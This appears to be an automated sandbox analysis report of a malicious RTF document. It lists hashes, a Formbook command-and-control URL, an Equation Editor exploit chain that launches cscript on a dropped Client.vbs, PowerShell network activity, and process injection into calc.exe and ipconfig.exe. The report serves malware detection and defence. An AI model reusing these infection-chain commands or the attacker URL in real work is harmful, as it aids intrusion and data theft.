Analysis
max time kernel: 147s
max time network: 106s
platform: windows7_x64
resource: win7v20201028
submitted: 18-01-2021 06:45
Static task
static1
Behavioral task
behavioral1
Sample
Req No. 1807164 LP21.doc.rtf
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Req No. 1807164 LP21.doc.rtf
Resource
win10v20201028
General
Target: Req No. 1807164 LP21.doc.rtf
Size: 1.5MB
MD5: 33ce04c3aaff4168b756498f34429eaf
SHA1: 8d2526c297d691bf04cc1a3b3add8e2303841cdf
SHA256: 3687f2ed161b33f5c9dba06ac1bc784f15a83c353a594d2cf9724bcb6f9c56ff
SHA512: 3c641ddd9bdfff484f621d97fb7c4e1196f51cb7e5a0b81b2671351d5511909b811c0b8ac1aefec7180b215280afba889f5c2d7cedb4ecf214b5276d9289dcc7
Malware Config
Extracted
formbook
http://www.raleighblacknursesrock.com/sly/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exe
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 596 | 952 | Powershell.exe |
-
Formbook Payload 3 IoCs
Processes:
resource | yara_rule
behavioral1/memory/1436-24-0x0000000000400000-0x000000000042E000-memory.dmp | formbook
behavioral1/memory/1436-25-0x000000000041EBA0-mapping.dmp | formbook
behavioral1/memory/932-34-0x0000000000080000-0x00000000000AE000-memory.dmp | formbook
-
Blocklisted process makes network request 4 IoCs
Processes:
Powershell.exe
flow | pid | process
7 | 596 | Powershell.exe
9 | 596 | Powershell.exe
11 | 596 | Powershell.exe
13 | 596 | Powershell.exe
-
Drops file in System32 directory 1 IoCs
Processes:
Powershell.exe
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | Powershell.exe
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
Powershell.exe calc.exe ipconfig.exe
description | pid | process | target process
PID 596 set thread context of 1436 | 596 | Powershell.exe | calc.exe
PID 1436 set thread context of 1272 | 1436 | calc.exe | Explorer.EXE
PID 932 set thread context of 1272 | 932 | ipconfig.exe | Explorer.EXE
-
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXE
description | ioc | process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
-
Office loads VBA resources, possible macro or embedded object present
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exe
pid | process
932 | ipconfig.exe
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXE
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXE
pid | process
1632 | WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes:
Powershell.execalc.exeipconfig.exepid process 596 Powershell.exe 596 Powershell.exe 596 Powershell.exe 596 Powershell.exe 596 Powershell.exe 596 Powershell.exe 596 Powershell.exe 596 Powershell.exe 1436 calc.exe 1436 calc.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe 932 ipconfig.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
calc.exe ipconfig.exe
pid | process
1436 | calc.exe
1436 | calc.exe
1436 | calc.exe
932 | ipconfig.exe
932 | ipconfig.exe
-
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
Powershell.exe calc.exe ipconfig.exe
description | pid | process
Token: SeDebugPrivilege | 596 | Powershell.exe
Token: SeIncreaseQuotaPrivilege | 596 | Powershell.exe
Token: SeSecurityPrivilege | 596 | Powershell.exe
Token: SeTakeOwnershipPrivilege | 596 | Powershell.exe
Token: SeLoadDriverPrivilege | 596 | Powershell.exe
Token: SeSystemProfilePrivilege | 596 | Powershell.exe
Token: SeSystemtimePrivilege | 596 | Powershell.exe
Token: SeProfSingleProcessPrivilege | 596 | Powershell.exe
Token: SeIncBasePriorityPrivilege | 596 | Powershell.exe
Token: SeCreatePagefilePrivilege | 596 | Powershell.exe
Token: SeBackupPrivilege | 596 | Powershell.exe
Token: SeRestorePrivilege | 596 | Powershell.exe
Token: SeShutdownPrivilege | 596 | Powershell.exe
Token: SeDebugPrivilege | 596 | Powershell.exe
Token: SeSystemEnvironmentPrivilege | 596 | Powershell.exe
Token: SeRemoteShutdownPrivilege | 596 | Powershell.exe
Token: SeUndockPrivilege | 596 | Powershell.exe
Token: SeManageVolumePrivilege | 596 | Powershell.exe
Token: 33 | 596 | Powershell.exe
Token: 34 | 596 | Powershell.exe
Token: 35 | 596 | Powershell.exe
Token: SeIncreaseQuotaPrivilege | 596 | Powershell.exe
Token: SeSecurityPrivilege | 596 | Powershell.exe
Token: SeTakeOwnershipPrivilege | 596 | Powershell.exe
Token: SeLoadDriverPrivilege | 596 | Powershell.exe
Token: SeSystemProfilePrivilege | 596 | Powershell.exe
Token: SeSystemtimePrivilege | 596 | Powershell.exe
Token: SeProfSingleProcessPrivilege | 596 | Powershell.exe
Token: SeIncBasePriorityPrivilege | 596 | Powershell.exe
Token: SeCreatePagefilePrivilege | 596 | Powershell.exe
Token: SeBackupPrivilege | 596 | Powershell.exe
Token: SeRestorePrivilege | 596 | Powershell.exe
Token: SeShutdownPrivilege | 596 | Powershell.exe
Token: SeDebugPrivilege | 596 | Powershell.exe
Token: SeSystemEnvironmentPrivilege | 596 | Powershell.exe
Token: SeRemoteShutdownPrivilege | 596 | Powershell.exe
Token: SeUndockPrivilege | 596 | Powershell.exe
Token: SeManageVolumePrivilege | 596 | Powershell.exe
Token: 33 | 596 | Powershell.exe
Token: 34 | 596 | Powershell.exe
Token: 35 | 596 | Powershell.exe
Token: SeDebugPrivilege | 1436 | calc.exe
Token: SeDebugPrivilege | 932 | ipconfig.exe
-
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXE
pid | process
1272 | Explorer.EXE
1272 | Explorer.EXE
1272 | Explorer.EXE
1272 | Explorer.EXE
-
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXE
pid | process
1272 | Explorer.EXE
1272 | Explorer.EXE
1272 | Explorer.EXE
1272 | Explorer.EXE
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXE
pid | process
1632 | WINWORD.EXE
1632 | WINWORD.EXE
-
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
EQNEDT32.EXE CmD.exe Powershell.exe Explorer.EXE ipconfig.exe
description | pid | process | target process
PID 1720 wrote to memory of 1624 | 1720 | EQNEDT32.EXE | CmD.exe
PID 1720 wrote to memory of 1624 | 1720 | EQNEDT32.EXE | CmD.exe
PID 1720 wrote to memory of 1624 | 1720 | EQNEDT32.EXE | CmD.exe
PID 1720 wrote to memory of 1624 | 1720 | EQNEDT32.EXE | CmD.exe
PID 1624 wrote to memory of 1780 | 1624 | CmD.exe | cscript.exe
PID 1624 wrote to memory of 1780 | 1624 | CmD.exe | cscript.exe
PID 1624 wrote to memory of 1780 | 1624 | CmD.exe | cscript.exe
PID 1624 wrote to memory of 1780 | 1624 | CmD.exe | cscript.exe
PID 596 wrote to memory of 1436 | 596 | Powershell.exe | calc.exe
PID 596 wrote to memory of 1436 | 596 | Powershell.exe | calc.exe
PID 596 wrote to memory of 1436 | 596 | Powershell.exe | calc.exe
PID 596 wrote to memory of 1436 | 596 | Powershell.exe | calc.exe
PID 596 wrote to memory of 1436 | 596 | Powershell.exe | calc.exe
PID 596 wrote to memory of 1436 | 596 | Powershell.exe | calc.exe
PID 596 wrote to memory of 1436 | 596 | Powershell.exe | calc.exe
PID 1272 wrote to memory of 932 | 1272 | Explorer.EXE | ipconfig.exe
PID 1272 wrote to memory of 932 | 1272 | Explorer.EXE | ipconfig.exe
PID 1272 wrote to memory of 932 | 1272 | Explorer.EXE | ipconfig.exe
PID 1272 wrote to memory of 932 | 1272 | Explorer.EXE | ipconfig.exe
PID 932 wrote to memory of 756 | 932 | ipconfig.exe | cmd.exe
PID 932 wrote to memory of 756 | 932 | ipconfig.exe | cmd.exe
PID 932 wrote to memory of 756 | 932 | ipconfig.exe | cmd.exe
PID 932 wrote to memory of 756 | 932 | ipconfig.exe | cmd.exe
Processes
-
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE 1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Req No. 1807164 LP21.doc.rtf" 2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\SysWOW64\ipconfig.exe" 2⤵
- Suspicious use of SetThreadContext
- Gathers network information
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe
/c del "C:\WINDOWS\syswow64\calc.exe" 3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding 1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\CmD.exe
CmD.exe /C cscript %tmp%\Client.vbs AC 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC 3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe 1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\calc.exe
"{path}" 2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Client.vbs
MD5: 8441686d35e4c4ffc920c51d345ed325
SHA1: 6cf3b6fc866c57479c0a0cd78c2e1a55e7989b3f
SHA256: 3d29d2e97327dcd50f03da93eff9bb90a0ec06f56eade454c944b89865e51ff3
SHA512: 2ab52182eb8af01230dd562662c4b1e8e6e3a45c460d9544d0525feb8f63a3c7f5adf4a5d976ff7f45214f5c03973210b33304f03249613ce968cf3a36c9db0f